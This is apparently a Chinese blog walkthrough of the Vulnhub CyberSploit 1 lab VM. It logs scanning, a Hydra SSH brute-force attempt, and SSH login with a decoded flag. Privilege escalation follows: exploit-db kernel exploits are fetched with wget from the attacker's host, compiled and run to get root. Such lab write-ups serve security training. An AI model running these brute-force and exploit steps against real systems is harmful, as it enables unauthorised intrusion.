首页 > 其他分享 >Vulnhub之CyberSploit靶机详细测试过程

Vulnhub之CyberSploit靶机详细测试过程

时间:2023-01-17 11:44:23浏览次数:47  
标签:itsskv 25 4.0 Jun 192.168 2020 Vulnhub 靶机 CyberSploit

CyberSploit

靶机信息

名称:cybersploit 1

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:72:62:36      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.176  08:00:27:df:60:2f      1      60  PCS Systemtechnik GmbH                      

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.176

NMAP扫描

──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.176 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-16 20:52 EST
Nmap scan report for localhost (192.168.56.176)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hello Pentester!
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:DF:60:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)

获得Shell

浏览器访问80端口,返回页面源代码中有注释:

</pre>



<!-------------username:itsskv--------------------->
</body>
</html>

这是SSH的用户名?可以hydra破解?暂时搁置,看一下通过目录扫描是否有更多信息?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ curl http://192.168.56.176/robots.txt                                          
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ echo 'R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9' | base64 -d
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}               

得到第1个Flag。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ nikto -h http://192.168.56.176                       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.176
+ Target Hostname:    192.168.56.176
+ Target Port:        80
+ Start Time:         2023-01-16 20:56:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 153327, size: 2333, mtime: Sat Jun 27 00:46:41 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-01-16 20:57:17 (GMT-5) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.176
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/16 20:57:55 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 2333]
/robots               (Status: 200) [Size: 79]
/hacker               (Status: 200) [Size: 3757743]
/server-status        (Status: 403) [Size: 295]
Progress: 220320 / 220561 (99.89%)
===============================================================
2023/01/16 20:59:35 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.176
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              txt,sh,php,html
[+] Timeout:                 10s
===============================================================
2023/01/16 21:00:35 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 2333]
/index.html           (Status: 200) [Size: 2333]
/.html                (Status: 403) [Size: 287]
/robots.txt           (Status: 200) [Size: 79]
/robots               (Status: 200) [Size: 79]
/hacker               (Status: 200) [Size: 3757743]
/.html                (Status: 403) [Size: 287]
/server-status        (Status: 403) [Size: 295]
Progress: 1101828 / 1102805 (99.91%)
===============================================================
2023/01/16 21:09:45 Finished
====================================================

其中hacker目录中含有一个图片(GIF格式),在继续尝试其他字典或者工具进行目录扫描,看是不是可以先破解一下SSH密码?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ hydra -l itsskv -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.176 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 21:11:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.176:22/
[STATUS] 78.00 tries/min, 78 tries in 00:01h, 14344327 to do in 3065:02h, 10 active
[STATUS] 72.00 tries/min, 216 tries in 00:03h, 14344189 to do in 3320:25h, 10 active
[STATUS] 66.57 tries/min, 466 tries in 00:07h, 14343939 to do in 3591:07h, 10 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
                                                                                       

没有破解出来。

晕,flag1得到就是SSH密码,看起来真心不像密码呀,难怪破解不出来

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ ssh [email protected]                                                
The authenticity of host '192.168.56.176 (192.168.56.176)' can't be established.
ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.176' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

332 packages can be updated.
273 updates are security updates.

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$ id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:~$ ls -alh
total 156K
drwxr-xr-x 20 itsskv itsskv 4.0K Jun 27  2020 .
drwxr-xr-x  4 root   root   4.0K Jun 25  2020 ..
-rw-------  1 itsskv itsskv  233 Jun 27  2020 .bash_history
-rw-r--r--  1 itsskv itsskv  220 Jun 25  2020 .bash_logout
-rw-r--r--  1 itsskv itsskv 3.5K Jun 25  2020 .bashrc
drwx------ 14 itsskv itsskv 4.0K Jun 25  2020 .cache
drwx------  9 itsskv itsskv 4.0K Jun 25  2020 .config
drwx------  3 itsskv itsskv 4.0K Jun 25  2020 .dbus
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Desktop
-rw-r--r--  1 itsskv itsskv   25 Jun 26  2020 .dmrc
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Documents
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Downloads
-rw-r--r--  1 itsskv itsskv 8.3K Jun 25  2020 examples.desktop
-rw-rw-r--  1 itsskv itsskv  495 Jun 27  2020 flag2.txt
drwx------  3 itsskv itsskv 4.0K Jun 26  2020 .gconf
drwx------  4 itsskv itsskv 4.0K Jun 25  2020 .gnome2
-rw-rw-r--  1 itsskv itsskv  142 Jun 26  2020 .gtk-bookmarks
drwx------  2 itsskv itsskv 4.0K Jun 25  2020 .gvfs
-rw-------  1 itsskv itsskv 1.1K Jun 26  2020 .ICEauthority
drwxr-xr-x  3 itsskv itsskv 4.0K Jun 25  2020 .local
drwx------  3 itsskv itsskv 4.0K Jun 25  2020 .mission-control
drwx------  4 itsskv itsskv 4.0K Jun 25  2020 .mozilla
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Music
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Pictures
-rw-r--r--  1 itsskv itsskv  675 Jun 25  2020 .profile
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Public
drwx------  2 itsskv itsskv 4.0K Jun 26  2020 .pulse
-rw-------  1 itsskv itsskv  256 Jun 25  2020 .pulse-cookie
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Templates
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Videos
-rw-------  1 itsskv itsskv    0 Jun 26  2020 .Xauthority
-rw-------  1 itsskv itsskv  12K Jun 26  2020 .xsession-errors
-rw-------  1 itsskv itsskv  14K Jun 26  2020 .xsession-errors.old
itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
itsskv@cybersploit-CTF:~$ 

用cyberchef工具解码(binary)

good work !
flag2: cybersploit{https:t.me/cybersploit1}

提权

将linpeas脚本上传至目标主机/tmp目录,修改权限,并执行脚本:

╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2                                                                       
  [1] exploit_x                                                                                                               
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [2] overlayfs
      CVE-2015-8660
      Source: http://www.exploit-db.com/exploits/39230
  [3] pp_key
      CVE-2016-0728
      Source: http://www.exploit-db.com/exploits/39277
  [4] timeoutpwn
      CVE-2014-0038
      Source: http://www.exploit-db.com/exploits/31346

itsskv@cybersploit-CTF:/tmp$ chmod +x linpeas.sh
itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/39230.c
--2023-01-17 08:55:20--  http://192.168.56.146:8000/39230.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8487 (8.3K) [text/x-csrc]
Saving to: `39230.c'

100%[====================================================================================>] 8,487       --.-K/s   in 0s      

2023-01-17 08:55:20 (40.2 MB/s) - `39230.c' saved [8487/8487]

itsskv@cybersploit-CTF:/tmp$ gcc -o exploit 39230.c
itsskv@cybersploit-CTF:/tmp$ chmod +x ./exploit
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$ 

执行失败。

itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/37292.c
--2023-01-17 09:00:00--  http://192.168.56.146:8000/37292.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: `37292.c'

100%[====================================================================================>] 4,968       --.-K/s   in 0s      

2023-01-17 09:00:00 (684 MB/s) - `37292.c' saved [4968/4968]

itsskv@cybersploit-CTF:/tmp$ gcc -o exploit2 37292.c
itsskv@cybersploit-CTF:/tmp$ chmod +x exploit2
itsskv@cybersploit-CTF:/tmp$ ./exploit2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls -alh
total 40K
drwx------  5 root root 4.0K Jun 27  2020 .
drwxr-xr-x 23 root root 4.0K Jun 25  2020 ..
-rw-------  1 root root  705 Jun 27  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  3 root root 4.0K Jun 27  2020 .cache
drwx------  3 root root 4.0K Jun 27  2020 .dbus
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4.0K Jan 17 07:20 .pulse
-rw-------  1 root root  256 Jun 25  2020 .pulse-cookie
-rw-r--r--  1 root root 1.2K Jun 27  2020 finalflag.txt
# cat finalflag.txt
  ______ ____    ____ .______    _______ .______          _______..______    __        ______    __  .___________.
 /      |\   \  /   / |   _  \  |   ____||   _  \        /       ||   _  \  |  |      /  __  \  |  | |           |
|  ,----' \   \/   /  |  |_)  | |  |__   |  |_)  |      |   (----`|  |_)  | |  |     |  |  |  | |  | `---|  |----`
|  |       \_    _/   |   _  <  |   __|  |      /        \   \    |   ___/  |  |     |  |  |  | |  |     |  |     
|  `----.    |  |     |  |_)  | |  |____ |  |\  \----.----)   |   |  |      |  `----.|  `--'  | |  |     |  |     
 \______|    |__|     |______/  |_______|| _| `._____|_______/    | _|      |_______| \______/  |__|     |__|     
                                                                                                                  

   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _  
  / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ 
 ( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s )
  \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ 

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

if you like it share with me https://twitter.com/cybersploit1.

Thanks !
# 

利用了另外一个漏洞利用脚本,可以成功提权。

标签:itsskv,25,4.0,Jun,192.168,2020,Vulnhub,靶机,CyberSploit
From: https://www.cnblogs.com/jason-huawen/p/17057471.html

相关文章

  • Vulnhub之Deathnote 靶机详细测试过程
    Deathnotes作者:jason_huawen靶机基本信息名称:Deathnote:1地址:https://www.vulnhub.com/entry/deathnote-1,739/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Dea......
  • Vulnhub之Dobby详细解题过程(不同的获得wordpress后台密码方法)
    Dobby作者:jason_huawen靶机信息名称:Hogwarts:Dobby地址:识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Dobby]└─$sudonetdiscover-ieth1-r192.168.56.0/2......
  • vulnhub靶场之VULNCMS: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:VulnCMS:1,下载地址:https://download.vulnhub.com/vulncms/VulnCMS.ova,下载后直接vbox打开即可。知识点:Joomla框架的注入漏洞、D......
  • Vulnhub之Driftingblues 1靶机测试过程
    Driftingblues1识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Driftingblues1]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!......
  • vulnhub靶场之HACKABLE: II
    准备:攻击机:虚拟机kali、本机win10。靶机:Hackable:II,下载地址:https://download.vulnhub.com/hackable/hackableII.ova,下载后直接vbox打开即可。知识点:就是简单的一句话......
  • Vulnhub之Dusk靶机测试过程
    Dusk识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Dusk]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:Uniq......
  • Vulnhub之Drippingblues靶机详细测试过程(实现提权)
    Drippingblues作者:jason_huawen靶机信息名称:DrippingBlues:1地址:https://www.vulnhub.com/entry/dripping-blues-1,744/识别目标主机IP地址──(kali㉿kali)-[~/......
  • 靶机练习 - 温故知新 - Toppo(sudo 提权)
    重新做了一下以前做过的第一个靶机(https://www.cnblogs.com/sallyzhang/p/12792042.html),这个靶机主要是练习sudo提权,当时不会也没理解。开启靶机,直接告诉了IP地址:端口......
  • Matrix-Breakout: 2 Morpheus-vulnhub靶场
    环境信息靶机:192.168.124.153攻击机:192.168.124.129打靶过程nmap扫描端口及服务发现开放22,80,81端口访问80端口网站有一个黑客帝国里的角色Trinity,让我们调......
  • Vulnhub之Eric靶机详细测试过程
    Eric作者:jason_huawen靶机信息名称:SP:eric地址:https://www.vulnhub.com/entry/sp-eric,274/识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Eric]└─$......